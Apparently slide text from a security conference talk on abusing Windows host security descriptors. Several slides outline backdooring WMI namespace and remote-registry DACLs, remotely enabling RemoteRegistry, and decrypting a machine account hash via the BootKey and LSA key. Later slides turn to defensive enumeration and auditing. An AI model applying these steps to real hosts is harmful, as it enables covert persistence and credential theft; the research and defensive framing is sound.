  • 42. WMI NameSpaces × Contains a collection of WMI classes that host various methods/properties × Each namespace has associated DACLs × Windows checks the DCOM machine-wide launch permissions for the first stage of access × If successful, the DACLs on the WMI namespace are then checked × Backdoor a NameSpace that contains a class with a useful method × Create() method of Win32_Process, for example 42
  • 43. WMI NameSpaces × Call GetSecurityDescriptor() on the target WMI namespace (local requires SeSecurityPrivilege) × Use Win32_Ace to set our Access Mask and flags × Use Win32_Trustee to assign the user × Set the “Trustee” property of Win32_Ace to our Win32_Trustee object × Add our new ACE to the target namespace DACL: $NameSpaceACL.DACL += $Ace.PSObject.ImmediateBaseObject × Call SetSecurityDescriptor() with the newly updated NameSpace object to set it 43
  • 46. × Securable Objects a. Printer Servers HKLMSYSTEMCurrentControlSetControl PrintServerSecurityDescriptor a. Printer Objects HKEY_LOCAL_MACHINESOFTWAREMicrosoft Windows NTCurrentVersionPrintPrinters Security a. Print Jobs - Not very interesting offensively Specifications: MS-RPRN, MS-PAR, MS-PAN, MS-PRSOD 46 Printers
  • 51. Remote Registry × Allows permitted users/groups to access the registry remotely via .NET/Win32 API × [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey() × The RemoteRegistry service has to be enabled and the calling user has to have access × By default in Windows 7/10, this service is disabled × Remote access to the registry == ability to dump hashes (among other things) 😈 51
  • 52. Remote Registry × Imagine this scenario: Remotely dumping an endpoint’s machine account hash as an unprivileged user × Remotely backdoor the winreg key for a specified user/group × Located at HKLM:SYSTEMCurrentControlSetControl SecurePipeServerswinreg × The DACL on this key decides who is allowed to connect via remote registry 52
  • 53. Remote Registry × Can be accomplished via WMI’s StdRegProv provider × Call SetSecurityDescriptor() with an ACE that defines the user/permissions for the backdoor × Why not just use StdRegProv? × Dumping the machine account hash requires obtaining various Registry Key classes. × Can only be obtained via RegQueryInfoKey() × Use Set-Service to remotely set the service StartupType to “Manual” × Set-Service -Name "RemoteRegistry" -ComputerName $Computer -StartupType "Manual" 53
  • 54. Remote Registry × Remotely take ownership of the SECURITY registry hive and add an ACE to the DACL for the backdoor user × As that user, remotely call RegConnectRegistry() × Open the required keys and pull the Key’s Class × SYSTEMCurrentControlSetControlLsa<JD,Skew1,GBG,DATA> × RegOpenKeyEx(), RegQueryInfoKey() × Combine these Class values and compute the BootKey × Use the BootKey to decrypt the LSA key × Use the LSA key to decrypt the machine account hash 54
  • 58. × A system access control list × “Enables administrators to log attempts to access a secured object” × Not used as extensively as they should be! SACLs: the other ACL 58
  • 59. Defensive Enumeration × More research is needed- you can’t defend against what you aren’t aware of! × Defensive PowerUp++ ? Operational test framework for the detection of backdoor scenarios? × Integration into BloodHound? 59
  • 60. Takeaways × The host-control graph is *MUCH* bigger than “is member of local admin group” × What is the real attack surface of a Windows host? × Many “forgotten” or unexplored RPC/DCOM servers × Many other securable objects we haven’t looked at 60
  • 61. 61
  • 62. × Implications of other securable objects × Real-time analysis × Enumeration of objects visible only to the kernel × Chaining host + AD security descriptor abuse Takeaways & Future Work 62
  • 63. Thanks! Any questions? @tifkin_ / @enigma0x3 / @harmj0y https://specterops.io/ 63